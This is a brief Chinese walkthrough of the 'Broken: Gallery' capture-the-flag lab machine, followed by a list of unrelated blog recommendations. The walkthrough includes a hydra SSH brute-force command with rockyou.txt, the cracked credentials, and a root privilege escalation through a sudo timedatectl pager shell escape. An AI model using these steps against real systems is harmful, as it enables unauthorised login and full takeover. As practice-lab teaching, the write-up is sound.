Broken: Gallery靶机

端口扫描

靶机ip地址为 192.168.153.157

目录扫描

访问80端口

点击查看,目录拼接访问,没有发现什么有用信息

尝试22端口的ssh进行爆破

hydra -L rockyou.txt -P rockyou.txt 192.168.153.157 ssh

爆破出密码 broken | broken

ssh连接

ssh broken@192.168.153.157

连接成功

提权

sudo -l

sudo timedatectl list-timezones

!/bin/sh

相关推荐
令狐少侠20115 小时前
centos7安装MySQL8.4手册
linux·mysql
程序员JerrySUN6 小时前
深度理解 KVM:Linux 内核系统学习的重要角度
java·linux·学习
大母猴啃编程6 小时前
Linux权限
linux·运维·服务器
weixin_457665396 小时前
基于可变参模板的线程池
linux·c++
麟城Lincoln7 小时前
【Linux-云原生-笔记】LVS(Linux virual server)相关
linux·笔记·云原生·lvs·nat·dr·ipvsadm
为什么要内卷,摆烂不香吗7 小时前
LVS部署DR模式集群
服务器·数据库·lvs
枷锁—sha7 小时前
从零掌握XML与DTD实体:原理、XXE漏洞攻防
xml·前端·网络·chrome·web安全·网络安全
菜菜why7 小时前
linux制作镜像、压缩镜像、烧录的方法
linux·镜像·香橙派
cpsvps9 小时前
香港服务器SSH安全加固方案与密钥认证实践
服务器·安全·ssh
运维开发王义杰9 小时前
告别手动迁移:使用 PowerShell 一键导出 IIS 配置,让服务器迁移更轻松
运维·服务器·windows